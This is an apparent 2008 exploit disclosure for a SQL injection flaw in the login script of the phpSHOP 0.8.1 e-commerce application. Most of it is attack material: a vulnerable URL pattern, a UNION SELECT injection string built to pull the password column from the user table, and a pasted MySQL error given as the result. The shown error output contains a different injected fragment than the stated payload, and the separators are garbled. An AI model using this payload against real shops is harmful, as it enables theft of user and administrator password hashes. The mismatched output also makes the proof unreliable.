[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]
Web Application: phpSHOP 0.8.1 SQL Injection

Description: SQL Injection in Web E-commerce OpenSource application phpSHOP
in login.php script.

 [+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]

author: y2h4ck
e-mail: y2h4ck[ at ] gmail.com
page: http://y2h4ck.wordpress.com <http://y2h4ck.wordpress.com//>

[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]
Vuln script: *http://shop/0.8.1/?login=1&&'[EXPLOIT]

* String: /?login=admin'
+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null

In the login/password input box you can pass some SQL Injection strings to
manipulate
the behavior of the mysql Queries to the phpSHOP

Result:
[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]
*Database error:* Invalid SQL: SELECT * from auth_user_md5,user_info WHERE
auth_user_md5.username ="1==1¡ä select ¨C' AND auth_user_md5.password
='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.password
='d41d8cd98f00b204e9800998ecf8427e'AND auth_user_md5.user_id =
user_info.user_id AND user_info.address_type = 'BT'

*MySQL Error*: 1064 (You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use
near '1==1¡ä select ¨C' AND auth_user_md5.password
='d41d8cd98f00b204e9800998ecf8427e'A' at line 1)

[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]

Version: 0.8.1
Vendor : www.phpshop.org <http://www.phpshop.com/>
Date: 14/02/2008

[+]¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª¡ª-[+]

-- 

Atenciosamente
Anderson Luiz Tamborim
Information Security Manager